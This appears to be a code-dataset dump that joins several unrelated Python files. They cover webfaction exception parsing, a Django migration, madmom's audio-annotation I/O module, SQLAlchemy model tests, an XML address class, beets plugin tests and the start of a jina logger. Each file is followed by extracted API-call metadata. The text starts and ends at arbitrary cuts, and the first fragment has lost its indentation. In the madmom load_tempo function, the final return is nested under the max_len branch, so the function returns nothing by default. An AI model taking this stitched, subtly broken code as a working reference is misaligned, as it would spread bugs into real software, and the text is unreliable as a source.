self.exception_type = _parse_exc_type(exc_type)
self.exception_message = _parse_exc_message(exc_message)
except ValueError:
self.exception_type = None
self.exception_message = None
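# Illustrative sketch (not part of the original module): how a typical
# xmlrpc faultString would be decomposed by the helpers above; the sample
# exception name and message are made up.
# >>> fault = "<class 'webfaction_api.exceptions.DataError'>:['username exists']"
# >>> exc_type, exc_message = fault.split(':', 1)
# >>> _parse_exc_type(exc_type)
# 'DataError'
# >>> _parse_exc_message(exc_message)
# 'username exists'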
| [
"ast.literal_eval"
] | [((620, 649), 'ast.literal_eval', 'ast.literal_eval', (['exc_message'], {}), '(exc_message)\n', (636, 649), False, 'import ast\n')] |
# Generated by Django 2.2.9 on 2019-12-30 10:47
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('secret', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='secret',
name='expiry_date',
field=models.DateTimeField(blank=True, null=True),
),
]
| [
"django.db.models.DateTimeField"
] | [((329, 372), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'blank': '(True)', 'null': '(True)'}), '(blank=True, null=True)\n', (349, 372), False, 'from django.db import migrations, models\n')] |
# encoding: utf-8
"""
Input/output package.
"""
from __future__ import absolute_import, division, print_function
import io as _io
import contextlib
import numpy as np
from .audio import load_audio_file
from .midi import load_midi, write_midi
from ..utils import suppress_warnings, string_types
ENCODING = 'utf8'
# dtype for numpy structured arrays that contain labelled segments
# 'label' needs to be castable to str
SEGMENT_DTYPE = [('start', float), ('end', float), ('label', object)]  # built-in float (np.float is deprecated)
# context manager to transparently handle both file names and open file handles
@contextlib.contextmanager
def open_file(filename, mode='r'):
"""
Context manager which yields an open file or handle with the given mode
and closes it if needed afterwards.
Parameters
----------
filename : str or file handle
File (handle) to open.
mode: {'r', 'w'}
Specifies the mode in which the file is opened.
Yields
------
Open file (handle).
"""
# check if we need to open the file
if isinstance(filename, string_types):
f = fid = _io.open(filename, mode)
else:
f = filename
fid = None
# yield an open file handle
yield f
# close the file if needed
if fid:
fid.close()
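# Illustrative usage (not part of the original code): `open_file` accepts
# either a file name or an already opened handle, and only closes handles
# it opened itself.
# >>> with open_file('onsets.txt') as f:
# ...     data = f.read()
# >>> with _io.open('onsets.txt') as fid:
# ...     with open_file(fid) as f:      # handle is passed through, left open
# ...         data = f.read()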
@suppress_warnings
def load_events(filename):
"""
Load a events from a text file, one floating point number per line.
Parameters
----------
filename : str or file handle
File to load the events from.
Returns
-------
numpy array
Events.
Notes
-----
Comments (lines starting with '#') and additional columns are ignored,
i.e. only the first column is returned.
"""
# read in the events, one per line
events = np.loadtxt(filename, ndmin=2)
# 1st column is the event's time, the rest is ignored
return events[:, 0]
def write_events(events, filename, fmt='%.3f', delimiter='\t', header=None):
"""
Write the events to a file, one event per line.
Parameters
----------
events : numpy array
Events to be written to file.
filename : str or file handle
File to write the events to.
fmt : str or sequence of strs, optional
A single format (e.g. '%.3f'), a sequence of formats, or a multi-format
string (e.g. '%.3f %.3f'), in which case `delimiter` is ignored.
delimiter : str, optional
String or character separating columns.
header : str, optional
String that will be written at the beginning of the file as comment.
"""
events = np.array(events)
# reformat fmt to be a single string if needed
if isinstance(fmt, (list, tuple)):
fmt = delimiter.join(fmt)
# write output
with open_file(filename, 'wb') as f:
# write header
if header is not None:
f.write(bytes(('# ' + header + '\n').encode(ENCODING)))
# write events
for e in events:
try:
string = fmt % tuple(e.tolist())
except AttributeError:
string = e
except TypeError:
string = fmt % e
f.write(bytes((string + '\n').encode(ENCODING)))
f.flush()
load_onsets = load_events
write_onsets = write_events
@suppress_warnings
def load_beats(filename, downbeats=False):
"""
Load the beats from the given file, one beat per line of format
'beat_time' ['beat_number'].
Parameters
----------
filename : str or file handle
File to load the beats from.
downbeats : bool, optional
Load only downbeats instead of beats.
Returns
-------
numpy array
Beats.
"""
values = np.loadtxt(filename, ndmin=1)
if values.ndim > 1:
if downbeats:
# rows with a "1" in the 2nd column are downbeats
return values[values[:, 1] == 1][:, 0]
else:
# 1st column is the beat time, the rest is ignored
return values[:, 0]
return values
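# For example (illustrative): a two-column beats file with the lines
# "0.50 1", "1.00 2", "1.50 3", "2.00 1" yields all four beat times by
# default and only [0.50, 2.00] with `downbeats=True`.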
def write_beats(beats, filename, fmt=None, delimiter='\t', header=None):
"""
Write the beats to a file.
Parameters
----------
beats : numpy array
Beats to be written to file.
filename : str or file handle
File to write the beats to.
fmt : str or sequence of strs, optional
A single format (e.g. '%.3f'), a sequence of formats (e.g.
['%.3f', '%d']), or a multi-format string (e.g. '%.3f %d'), in which
case `delimiter` is ignored.
delimiter : str, optional
String or character separating columns.
header : str, optional
String that will be written at the beginning of the file as comment.
"""
if fmt is None and beats.ndim == 2:
fmt = ['%.3f', '%d']
elif fmt is None:
fmt = '%.3f'
write_events(beats, filename, fmt, delimiter, header)
def load_downbeats(filename):
"""
Load the downbeats from the given file.
Parameters
----------
filename : str or file handle
File to load the downbeats from.
Returns
-------
numpy array
Downbeats.
"""
return load_beats(filename, downbeats=True)
def write_downbeats(beats, filename, fmt=None, delimiter='\t', header=None):
"""
Write the downbeats to a file.
Parameters
----------
beats : numpy array
Beats or downbeats to be written to file.
filename : str or file handle
File to write the beats to.
fmt : str or sequence of strs, optional
A single format (e.g. '%.3f'), a sequence of formats (e.g.
['%.3f', '%d']), or a multi-format string (e.g. '%.3f %d'), in which
case `delimiter` is ignored.
delimiter : str, optional
String or character separating columns.
header : str, optional
String that will be written at the beginning of the file as comment.
Notes
-----
If `beats` contains both time and number of the beats, they are filtered
to contain only the downbeats (i.e. only the times of those beats with a
beat number of 1).
"""
if beats.ndim == 2:
beats = beats[beats[:, 1] == 1][:, 0]
if fmt is None:
fmt = '%.3f'
write_events(beats, filename, fmt, delimiter, header)
@suppress_warnings
def load_notes(filename):
"""
Load the notes from the given file, one note per line of format
'onset_time' 'note_number' ['duration' ['velocity']].
Parameters
----------
filename: str or file handle
File to load the notes from.
Returns
-------
numpy array
Notes.
"""
return np.loadtxt(filename, ndmin=2)
def write_notes(notes, filename, fmt=None, delimiter='\t', header=None):
"""
Write the notes to a file.
Parameters
----------
notes : numpy array, shape (num_notes, 2)
Notes, row format 'onset_time' 'note_number' ['duration' ['velocity']].
filename : str or file handle
File to write the notes to.
fmt : str or sequence of strs, optional
A sequence of formats (e.g. ['%.3f', '%d', '%.3f', '%d']), or a
multi-format string, e.g. '%.3f %d %.3f %d', in which case `delimiter`
is ignored.
delimiter : str, optional
String or character separating columns.
header : str, optional
String that will be written at the beginning of the file as comment.
Returns
-------
numpy array
Notes.
"""
# set default format
if fmt is None:
fmt = ['%.3f', '%d', '%.3f', '%d']
if not notes.ndim == 2:
raise ValueError('unknown format for `notes`')
    # truncate format to the number of columns given
fmt = delimiter.join(fmt[:notes.shape[1]])
# write the notes
write_events(notes, filename, fmt=fmt, delimiter=delimiter, header=header)
def load_segments(filename):
"""
Load labelled segments from file, one segment per line. Each segment is of
form <start> <end> <label>, where <start> and <end> are floating point
numbers, and <label> is a string.
Parameters
----------
filename : str or file handle
File to read the labelled segments from.
Returns
-------
segments : numpy structured array
Structured array with columns 'start', 'end', and 'label',
containing the beginning, end, and label of segments.
"""
start, end, label = [], [], []
with open_file(filename) as f:
for line in f:
s, e, l = line.split()
start.append(float(s))
end.append(float(e))
label.append(l)
segments = np.zeros(len(start), dtype=SEGMENT_DTYPE)
segments['start'] = start
segments['end'] = end
segments['label'] = label
return segments
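# For example (illustrative): a file with the lines "0.0 10.5 intro" and
# "10.5 41.3 verse" yields a structured array with
# segments['start'] == [0.0, 10.5], segments['end'] == [10.5, 41.3] and
# segments['label'] == ['intro', 'verse'].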
def write_segments(segments, filename, fmt=None, delimiter='\t', header=None):
"""
Write labelled segments to a file.
Parameters
----------
segments : numpy structured array
Labelled segments, one per row (column definition see SEGMENT_DTYPE).
filename : str or file handle
Output filename or handle.
fmt : str or sequence of strs, optional
A sequence of formats (e.g. ['%.3f', '%.3f', '%s']), or a multi-format
string (e.g. '%.3f %.3f %s'), in which case `delimiter` is ignored.
delimiter : str, optional
String or character separating columns.
header : str, optional
String that will be written at the beginning of the file as comment.
Returns
-------
numpy structured array
Labelled segments
Notes
-----
Labelled segments are represented as numpy structured array with three
named columns: 'start' contains the start position (e.g. seconds),
'end' the end position, and 'label' the segment label.
"""
if fmt is None:
fmt = ['%.3f', '%.3f', '%s']
write_events(segments, filename, fmt=fmt, delimiter=delimiter,
header=header)
load_chords = load_segments
write_chords = write_segments
def load_key(filename):
"""
Load the key from the given file.
Parameters
----------
filename : str or file handle
File to read key information from.
Returns
-------
str
Key.
"""
with open_file(filename) as f:
return f.read().strip()
def write_key(key, filename, header=None):
"""
Write key string to a file.
Parameters
----------
key : str
Key name.
filename : str or file handle
Output file.
header : str, optional
String that will be written at the beginning of the file as comment.
Returns
-------
key : str
Key name.
"""
write_events([key], filename, fmt='%s', header=header)
def load_tempo(filename, split_value=1., sort=None, norm_strengths=None,
max_len=None):
"""
Load tempo information from the given file.
Tempo information must have the following format:
'main tempo' ['secondary tempo' ['relative_strength']]
Parameters
----------
filename : str or file handle
File to load the tempo from.
split_value : float, optional
Value to distinguish between tempi and strengths.
`values` > `split_value` are interpreted as tempi [bpm],
`values` <= `split_value` are interpreted as strengths.
sort : bool, deprecated
Sort the tempi by their strength.
norm_strengths : bool, deprecated
Normalize the strengths to sum 1.
max_len : int, deprecated
Return at most `max_len` tempi.
Returns
-------
tempi : numpy array, shape (num_tempi[, 2])
Array with tempi. If no strength is parsed, a 1-dimensional array of
length 'num_tempi' is returned. If strengths are given, a 2D array
with tempi (first column) and their relative strengths (second column)
is returned.
"""
# try to load the data from file
values = np.loadtxt(filename, ndmin=1)
    # split the loaded values into tempi and strengths according to `split_value`
# TODO: this is kind of hack-ish, find a better solution
tempi = values[values > split_value]
strengths = values[values <= split_value]
# make the strengths behave properly
strength_sum = np.sum(strengths)
# relative strengths are given (one less than tempi)
if len(tempi) - len(strengths) == 1:
strengths = np.append(strengths, 1. - strength_sum)
if np.any(strengths < 0):
raise AssertionError('strengths must be positive')
# no strength is given, assume an evenly distributed one
if strength_sum == 0:
strengths = np.ones_like(tempi) / float(len(tempi))
# normalize the strengths
if norm_strengths is not None:
import warnings
warnings.warn('`norm_strengths` is deprecated as of version 0.16 and '
'will be removed in 0.18. Please normalize strengths '
'separately.')
strengths /= float(strength_sum)
# tempi and strengths must have same length
if len(tempi) != len(strengths):
raise AssertionError('tempi and strengths must have same length')
# order the tempi according to their strengths
if sort:
import warnings
warnings.warn('`sort` is deprecated as of version 0.16 and will be '
'removed in 0.18. Please sort the returned array '
'separately.')
# Note: use 'mergesort', because we want a stable sorting algorithm
# which keeps the order of the keys in case of duplicate keys
# but we need to apply this '(-strengths)' trick because we want
# tempi with uniformly distributed strengths to keep their order
sort_idx = (-strengths).argsort(kind='mergesort')
tempi = tempi[sort_idx]
strengths = strengths[sort_idx]
# return at most 'max_len' tempi and their relative strength
if max_len is not None:
import warnings
warnings.warn('`max_len` is deprecated as of version 0.16 and will be '
'removed in 0.18. Please truncate the returned array '
'separately.')
return np.vstack((tempi[:max_len], strengths[:max_len])).T
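# Worked example (illustrative): a tempo file containing "120 60 0.7" is
# split into tempi [120, 60] and strengths [0.7]; the missing strength is
# filled with 1 - 0.7 = 0.3, so the returned array is
# [[120.0, 0.7], [60.0, 0.3]].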
def write_tempo(tempi, filename, delimiter='\t', header=None, mirex=None):
"""
Write the most dominant tempi and the relative strength to a file.
Parameters
----------
tempi : numpy array
Array with the detected tempi (first column) and their strengths
(second column).
filename : str or file handle
Output file.
delimiter : str, optional
String or character separating columns.
header : str, optional
String that will be written at the beginning of the file as comment.
mirex : bool, deprecated
Report the lower tempo first (as required by MIREX).
Returns
-------
tempo_1 : float
The most dominant tempo.
tempo_2 : float
The second most dominant tempo.
strength : float
Their relative strength.
"""
# make the given tempi a 2d array
tempi = np.array(tempi, ndmin=2)
# default values
t1 = t2 = strength = np.nan
# only one tempo was detected
if len(tempi) == 1:
t1 = tempi[0][0]
strength = 1.
# consider only the two strongest tempi and strengths
elif len(tempi) > 1:
t1, t2 = tempi[:2, 0]
strength = tempi[0, 1] / sum(tempi[:2, 1])
# for MIREX, the lower tempo must be given first
if mirex is not None:
import warnings
warnings.warn('`mirex` argument is deprecated as of version 0.16 '
'and will be removed in version 0.17. Please sort the '
'tempi manually')
if t1 > t2:
t1, t2, strength = t2, t1, 1. - strength
# format as a numpy array and write to output
out = np.array([t1, t2, strength], ndmin=2)
write_events(out, filename, fmt=['%.2f', '%.2f', '%.2f'],
delimiter=delimiter, header=header)
| [
"numpy.sum",
"numpy.ones_like",
"numpy.any",
"numpy.append",
"numpy.array",
"numpy.loadtxt",
"io.open",
"warnings.warn",
"numpy.vstack"
] | [((1773, 1802), 'numpy.loadtxt', 'np.loadtxt', (['filename'], {'ndmin': '(2)'}), '(filename, ndmin=2)\n', (1783, 1802), True, 'import numpy as np\n'), ((2590, 2606), 'numpy.array', 'np.array', (['events'], {}), '(events)\n', (2598, 2606), True, 'import numpy as np\n'), ((3721, 3750), 'numpy.loadtxt', 'np.loadtxt', (['filename'], {'ndmin': '(1)'}), '(filename, ndmin=1)\n', (3731, 3750), True, 'import numpy as np\n'), ((6644, 6673), 'numpy.loadtxt', 'np.loadtxt', (['filename'], {'ndmin': '(2)'}), '(filename, ndmin=2)\n', (6654, 6673), True, 'import numpy as np\n'), ((11974, 12003), 'numpy.loadtxt', 'np.loadtxt', (['filename'], {'ndmin': '(1)'}), '(filename, ndmin=1)\n', (11984, 12003), True, 'import numpy as np\n'), ((12290, 12307), 'numpy.sum', 'np.sum', (['strengths'], {}), '(strengths)\n', (12296, 12307), True, 'import numpy as np\n'), ((15168, 15192), 'numpy.array', 'np.array', (['tempi'], {'ndmin': '(2)'}), '(tempi, ndmin=2)\n', (15176, 15192), True, 'import numpy as np\n'), ((15944, 15981), 'numpy.array', 'np.array', (['[t1, t2, strength]'], {'ndmin': '(2)'}), '([t1, t2, strength], ndmin=2)\n', (15952, 15981), True, 'import numpy as np\n'), ((1102, 1126), 'io.open', '_io.open', (['filename', 'mode'], {}), '(filename, mode)\n', (1110, 1126), True, 'import io as _io\n'), ((12426, 12466), 'numpy.append', 'np.append', (['strengths', '(1.0 - strength_sum)'], {}), '(strengths, 1.0 - strength_sum)\n', (12435, 12466), True, 'import numpy as np\n'), ((12477, 12498), 'numpy.any', 'np.any', (['(strengths < 0)'], {}), '(strengths < 0)\n', (12483, 12498), True, 'import numpy as np\n'), ((12807, 12951), 'warnings.warn', 'warnings.warn', (['"""`norm_strengths` is deprecated as of version 0.16 and will be removed in 0.18. Please normalize strengths separately."""'], {}), "(\n '`norm_strengths` is deprecated as of version 0.16 and will be removed in 0.18. Please normalize strengths separately.'\n )\n", (12820, 12951), False, 'import warnings\n'), ((13288, 13426), 'warnings.warn', 'warnings.warn', (['"""`sort` is deprecated as of version 0.16 and will be removed in 0.18. Please sort the returned array separately."""'], {}), "(\n '`sort` is deprecated as of version 0.16 and will be removed in 0.18. Please sort the returned array separately.'\n )\n", (13301, 13426), False, 'import warnings\n'), ((14032, 14177), 'warnings.warn', 'warnings.warn', (['"""`max_len` is deprecated as of version 0.16 and will be removed in 0.18. Please truncate the returned array separately."""'], {}), "(\n '`max_len` is deprecated as of version 0.16 and will be removed in 0.18. Please truncate the returned array separately.'\n )\n", (14045, 14177), False, 'import warnings\n'), ((14229, 14278), 'numpy.vstack', 'np.vstack', (['(tempi[:max_len], strengths[:max_len])'], {}), '((tempi[:max_len], strengths[:max_len]))\n', (14238, 14278), True, 'import numpy as np\n'), ((15626, 15770), 'warnings.warn', 'warnings.warn', (['"""`mirex` argument is deprecated as of version 0.16 and will be removed in version 0.17. Please sort the tempi manually"""'], {}), "(\n '`mirex` argument is deprecated as of version 0.16 and will be removed in version 0.17. Please sort the tempi manually'\n )\n", (15639, 15770), False, 'import warnings\n'), ((12670, 12689), 'numpy.ones_like', 'np.ones_like', (['tempi'], {}), '(tempi)\n', (12682, 12689), True, 'import numpy as np\n')] |
from acondbs.db.sa import sa
from acondbs.models import Map, Beam
# These tests are written primarily for the developer to understand
# how models in flask_sqlalchemy work.
# __________________________________________________________________||
def test_simple(app):
'''A simple test of adding an object
'''
with app.app_context():
# save the initial number of the maps to compare later
nmaps = len(Map.query.all())
    # this instantiation doesn't need to be within an app context
map1 = Map(name="map1")
with app.app_context():
sa.session.add(map1)
sa.session.commit()
with app.app_context():
# test the number of the maps is increased by one
assert (nmaps + 1) == len(Map.query.all())
# the new map can be retrieved in a different app context
map1_ = Map.query.filter_by(name='map1').first()
assert isinstance(map1_, Map)
# __________________________________________________________________||
def test_python_object(app):
'''A simple test about Python object
'''
map1 = Map(name="map1")
with app.app_context():
sa.session.add(map1)
sa.session.commit()
map1_ = Map.query.filter_by(name='map1').first()
# the query returns the same Python object
assert map1 is map1_
with app.app_context():
map1_ = Map.query.filter_by(name='map1').first()
# In a different app context, no longer the same Python object
assert map1 is not map1_
# __________________________________________________________________||
def test_primary_key(app):
'''A simple test about the primary key
'''
map1 = Map(name="map1")
# The primary key (map_id) is None at this point
assert map1.map_id is None
with app.app_context():
sa.session.add(map1)
sa.session.commit()
# After the commit, map_id is automatically assigned
map_id = map1.map_id
assert map_id is not None
with app.app_context():
        # The object can be retrieved by the map_id in another context
map1 = Map.query.filter_by(map_id=map_id).first()
assert 'map1' == map1.name
# __________________________________________________________________||
def test_relation(app):
'''A simple test of adding an object with relation
'''
map1 = Map(name="map1")
beam1 = Beam(name="beam1", map=map1)
# The relation has been already established
assert map1 is beam1.map
assert [beam1] == map1.beams
# The primary and foreign keys are still None
assert map1.map_id is None
assert beam1.beam_id is None
assert beam1.input_map_id is None
with app.app_context():
sa.session.add(map1)
sa.session.commit()
# The primary keys are assigned
assert map1.map_id is not None
assert beam1.beam_id is not None
# The foreign key is correctly set
assert map1.map_id == beam1.input_map_id
with app.app_context():
map1 = Map.query.filter_by(name='map1').first()
beam1 = Beam.query.filter_by(name='beam1').first()
# The relation is preserved in a different app context
assert map1 is beam1.map
assert beam1 is map1.beams[0]
assert map1.map_id == beam1.input_map_id
# __________________________________________________________________||
| [
"acondbs.db.sa.sa.session.commit",
"acondbs.db.sa.sa.session.add",
"acondbs.models.Map",
"acondbs.models.Map.query.filter_by",
"acondbs.models.Map.query.all",
"acondbs.models.Beam",
"acondbs.models.Beam.query.filter_by"
] | [((521, 537), 'acondbs.models.Map', 'Map', ([], {'name': '"""map1"""'}), "(name='map1')\n", (524, 537), False, 'from acondbs.models import Map, Beam\n'), ((1087, 1103), 'acondbs.models.Map', 'Map', ([], {'name': '"""map1"""'}), "(name='map1')\n", (1090, 1103), False, 'from acondbs.models import Map, Beam\n'), ((1682, 1698), 'acondbs.models.Map', 'Map', ([], {'name': '"""map1"""'}), "(name='map1')\n", (1685, 1698), False, 'from acondbs.models import Map, Beam\n'), ((2359, 2375), 'acondbs.models.Map', 'Map', ([], {'name': '"""map1"""'}), "(name='map1')\n", (2362, 2375), False, 'from acondbs.models import Map, Beam\n'), ((2388, 2416), 'acondbs.models.Beam', 'Beam', ([], {'name': '"""beam1"""', 'map': 'map1'}), "(name='beam1', map=map1)\n", (2392, 2416), False, 'from acondbs.models import Map, Beam\n'), ((575, 595), 'acondbs.db.sa.sa.session.add', 'sa.session.add', (['map1'], {}), '(map1)\n', (589, 595), False, 'from acondbs.db.sa import sa\n'), ((604, 623), 'acondbs.db.sa.sa.session.commit', 'sa.session.commit', ([], {}), '()\n', (621, 623), False, 'from acondbs.db.sa import sa\n'), ((1141, 1161), 'acondbs.db.sa.sa.session.add', 'sa.session.add', (['map1'], {}), '(map1)\n', (1155, 1161), False, 'from acondbs.db.sa import sa\n'), ((1170, 1189), 'acondbs.db.sa.sa.session.commit', 'sa.session.commit', ([], {}), '()\n', (1187, 1189), False, 'from acondbs.db.sa import sa\n'), ((1821, 1841), 'acondbs.db.sa.sa.session.add', 'sa.session.add', (['map1'], {}), '(map1)\n', (1835, 1841), False, 'from acondbs.db.sa import sa\n'), ((1850, 1869), 'acondbs.db.sa.sa.session.commit', 'sa.session.commit', ([], {}), '()\n', (1867, 1869), False, 'from acondbs.db.sa import sa\n'), ((2718, 2738), 'acondbs.db.sa.sa.session.add', 'sa.session.add', (['map1'], {}), '(map1)\n', (2732, 2738), False, 'from acondbs.db.sa import sa\n'), ((2747, 2766), 'acondbs.db.sa.sa.session.commit', 'sa.session.commit', ([], {}), '()\n', (2764, 2766), False, 'from acondbs.db.sa import sa\n'), ((430, 445), 'acondbs.models.Map.query.all', 'Map.query.all', ([], {}), '()\n', (443, 445), False, 'from acondbs.models import Map, Beam\n'), ((746, 761), 'acondbs.models.Map.query.all', 'Map.query.all', ([], {}), '()\n', (759, 761), False, 'from acondbs.models import Map, Beam\n'), ((846, 878), 'acondbs.models.Map.query.filter_by', 'Map.query.filter_by', ([], {'name': '"""map1"""'}), "(name='map1')\n", (865, 878), False, 'from acondbs.models import Map, Beam\n'), ((1207, 1239), 'acondbs.models.Map.query.filter_by', 'Map.query.filter_by', ([], {'name': '"""map1"""'}), "(name='map1')\n", (1226, 1239), False, 'from acondbs.models import Map, Beam\n'), ((1374, 1406), 'acondbs.models.Map.query.filter_by', 'Map.query.filter_by', ([], {'name': '"""map1"""'}), "(name='map1')\n", (1393, 1406), False, 'from acondbs.models import Map, Beam\n'), ((2110, 2144), 'acondbs.models.Map.query.filter_by', 'Map.query.filter_by', ([], {'map_id': 'map_id'}), '(map_id=map_id)\n', (2129, 2144), False, 'from acondbs.models import Map, Beam\n'), ((3025, 3057), 'acondbs.models.Map.query.filter_by', 'Map.query.filter_by', ([], {'name': '"""map1"""'}), "(name='map1')\n", (3044, 3057), False, 'from acondbs.models import Map, Beam\n'), ((3082, 3116), 'acondbs.models.Beam.query.filter_by', 'Beam.query.filter_by', ([], {'name': '"""beam1"""'}), "(name='beam1')\n", (3102, 3116), False, 'from acondbs.models import Map, Beam\n')] |
from yattag import Doc
from .SimpleContent import (
AddressText,
AddressTypeName,
CountryCode,
CountyCode,
LocalityName,
PostalCode,
StateCode,
SupplementalAddressText,
)
class OrganizationAddress:
"""
The physical address of an organization.
"""
__addressTypeName: AddressTypeName
__addressText: AddressText
__supplementalAddressText: SupplementalAddressText
__localityName: LocalityName
__stateCode: StateCode
__postalCode: PostalCode
__countryCode: CountryCode
__countyCode: CountyCode
def __init__(
self,
o: dict = None,
*,
addressTypeName: AddressTypeName = None,
addressText: AddressText = None,
supplementalAddressText: SupplementalAddressText = None,
localityName: LocalityName = None,
stateCode: StateCode = None,
postalCode: PostalCode = None,
countryCode: CountryCode = None,
countyCode: CountyCode = None
):
if isinstance(o, OrganizationAddress):
# Assign attributes from object without typechecking
self.__addressTypeName = o.addressTypeName
self.__addressText = o.addressText
self.__supplementalAddressText = o.supplementalAddressText
self.__localityName = o.localityName
self.__stateCode = o.stateCode
self.__postalCode = o.postalCode
self.__countryCode = o.countryCode
self.__countyCode = o.countyCode
elif isinstance(o, dict):
# Assign attributes from dictionary with typechecking
self.addressTypeName = o.get("addressTypeName")
self.addressText = o.get("addressText")
self.supplementalAddressText = o.get("supplementalAddressText")
self.localityName = o.get("localityName")
self.stateCode = o.get("stateCode")
self.postalCode = o.get("postalCode")
self.countryCode = o.get("countryCode")
self.countyCode = o.get("countyCode")
else:
# Assign attributes from named keywords with typechecking
self.addressTypeName = addressTypeName
self.addressText = addressText
self.supplementalAddressText = supplementalAddressText
self.localityName = localityName
self.stateCode = stateCode
self.postalCode = postalCode
self.countryCode = countryCode
self.countyCode = countyCode
@property
def addressTypeName(self) -> AddressTypeName:
return self.__addressTypeName
@addressTypeName.setter
def addressTypeName(self, val: AddressTypeName) -> None:
self.__addressTypeName = None if val is None else AddressTypeName(val)
@property
def addressText(self) -> AddressText:
return self.__addressText
@addressText.setter
def addressText(self, val: AddressText) -> None:
self.__addressText = None if val is None else AddressText(val)
@property
def supplementalAddressText(self) -> SupplementalAddressText:
return self.__supplementalAddressText
@supplementalAddressText.setter
def supplementalAddressText(self, val: SupplementalAddressText) -> None:
self.__supplementalAddressText = (
None if val is None else SupplementalAddressText(val)
)
@property
def localityName(self) -> LocalityName:
return self.__localityName
@localityName.setter
def localityName(self, val: LocalityName) -> None:
self.__localityName = None if val is None else LocalityName(val)
@property
def stateCode(self) -> StateCode:
return self.__stateCode
@stateCode.setter
def stateCode(self, val: StateCode) -> None:
self.__stateCode = None if val is None else StateCode(val)
@property
def postalCode(self) -> PostalCode:
return self.__postalCode
@postalCode.setter
def postalCode(self, val: PostalCode) -> None:
self.__postalCode = None if val is None else PostalCode(val)
@property
def countryCode(self) -> CountryCode:
return self.__countryCode
@countryCode.setter
def countryCode(self, val: CountryCode) -> None:
self.__countryCode = None if val is None else CountryCode(val)
@property
def countyCode(self) -> CountyCode:
return self.__countyCode
@countyCode.setter
def countyCode(self, val: CountyCode) -> None:
self.__countyCode = None if val is None else CountyCode(val)
def generateXML(self, name: str = "OrganizationAddress") -> str:
doc = Doc()
line = doc.line
tag = doc.tag
with tag(name):
if self.__addressTypeName is not None:
line("AddressTypeName", self.__addressTypeName)
if self.__addressText is not None:
line("AddressText", self.__addressText)
if self.__supplementalAddressText is not None:
line("SupplementalAddressText", self.__supplementalAddressText)
if self.__localityName is not None:
line("LocalityName", self.__localityName)
if self.__stateCode is not None:
line("StateCode", self.__stateCode)
if self.__postalCode is not None:
line("PostalCode", self.__postalCode)
if self.__countryCode is not None:
line("CountryCode", self.__countryCode)
if self.__countyCode is not None:
line("CountyCode", self.__countyCode)
return doc.getvalue()
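# Illustrative usage sketch (not part of the original module); the address
# values below are made up.
# >>> addr = OrganizationAddress(
# ...     addressTypeName="Mailing",
# ...     addressText="123 Main St",
# ...     localityName="Springfield",
# ...     stateCode="VA",
# ...     postalCode="22150",
# ... )
# >>> addr.generateXML()
# '<OrganizationAddress><AddressTypeName>Mailing</AddressTypeName>...'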
| [
"yattag.Doc"
] | [((4778, 4783), 'yattag.Doc', 'Doc', ([], {}), '()\n', (4781, 4783), False, 'from yattag import Doc\n')] |
import os
import sys
from helper import CopyArtifactsTestCase
from beets import config
class CopyArtifactsFilename(CopyArtifactsTestCase):
"""
Tests to check handling of artifacts with filenames containing unicode characters
"""
def setUp(self):
super(CopyArtifactsFilename, self).setUp()
self._set_import_dir()
self.album_path = os.path.join(self.import_dir, 'the_album')
os.makedirs(self.album_path)
self._setup_import_session(autotag=False)
config['copyartifacts']['extensions'] = '.file'
def test_import_dir_with_unicode_character_in_artifact_name_copy(self):
open(os.path.join(self.album_path, u'\xe4rtifact.file'), 'a').close()
medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3')
self.import_media = [medium]
self._run_importer()
self.assert_in_lib_dir('Tag Artist', 'Tag Album', u'\xe4rtifact.file')
def test_import_dir_with_unicode_character_in_artifact_name_move(self):
config['import']['move'] = True
open(os.path.join(self.album_path, u'\xe4rtifact.file'), 'a').close()
medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3')
self.import_media = [medium]
self._run_importer()
self.assert_in_lib_dir('Tag Artist', 'Tag Album', u'\xe4rtifact.file')
def test_import_dir_with_illegal_character_in_album_name(self):
        config['paths']['ext:file'] = u'$albumpath/$artist - $album'
# Create import directory, illegal filename character used in the album name
open(os.path.join(self.album_path, u'artifact.file'), 'a').close()
medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'),
'full.mp3',
'Tag Album?')
self.import_media = [medium]
self._run_importer()
self.assert_in_lib_dir('Tag Artist', 'Tag Album_', u'Tag Artist - Tag Album_.file')
| [
"os.path.join",
"os.makedirs"
] | [((373, 415), 'os.path.join', 'os.path.join', (['self.import_dir', '"""the_album"""'], {}), "(self.import_dir, 'the_album')\n", (385, 415), False, 'import os\n'), ((424, 452), 'os.makedirs', 'os.makedirs', (['self.album_path'], {}), '(self.album_path)\n', (435, 452), False, 'import os\n'), ((753, 797), 'os.path.join', 'os.path.join', (['self.album_path', '"""track_1.mp3"""'], {}), "(self.album_path, 'track_1.mp3')\n", (765, 797), False, 'import os\n'), ((1191, 1235), 'os.path.join', 'os.path.join', (['self.album_path', '"""track_1.mp3"""'], {}), "(self.album_path, 'track_1.mp3')\n", (1203, 1235), False, 'import os\n'), ((1740, 1784), 'os.path.join', 'os.path.join', (['self.album_path', '"""track_1.mp3"""'], {}), "(self.album_path, 'track_1.mp3')\n", (1752, 1784), False, 'import os\n'), ((651, 698), 'os.path.join', 'os.path.join', (['self.album_path', 'u"""ärtifact.file"""'], {}), "(self.album_path, u'ärtifact.file')\n", (663, 698), False, 'import os\n'), ((1089, 1136), 'os.path.join', 'os.path.join', (['self.album_path', 'u"""ärtifact.file"""'], {}), "(self.album_path, u'ärtifact.file')\n", (1101, 1136), False, 'import os\n'), ((1641, 1688), 'os.path.join', 'os.path.join', (['self.album_path', 'u"""artifact.file"""'], {}), "(self.album_path, u'artifact.file')\n", (1653, 1688), False, 'import os\n')] |
import functools
import os
import time
from typing import List
from jina import DocumentArray
from jina.logging.logger import JinaLogger
from jina.enums import LogVerbosity
def _get_non_empty_fields_doc_array(docs: DocumentArray) -> List[str]:
non_empty_fields = list(docs[0].non_empty_fields)
    for doc in docs[1:]:
        # keep only the fields that are non-empty in every document
        non_empty_fields = [
            field for field in non_empty_fields if field in doc.non_empty_fields
        ]
return non_empty_fields
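# For example (illustrative): if the first Document has non-empty fields
# {'text', 'tags'} but a later one only has {'text'}, the helper returns
# ['text'], i.e. the fields populated across the whole DocumentArray.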
def add_request_logger(logger):
"""
Add logging functionality to a request function.
Only shows logs for `JINA_LOG_LEVEL` > info.
You can set this as an env variable before starting your `Jina` application.
Example usages:
>>> from jina import Executor, requests
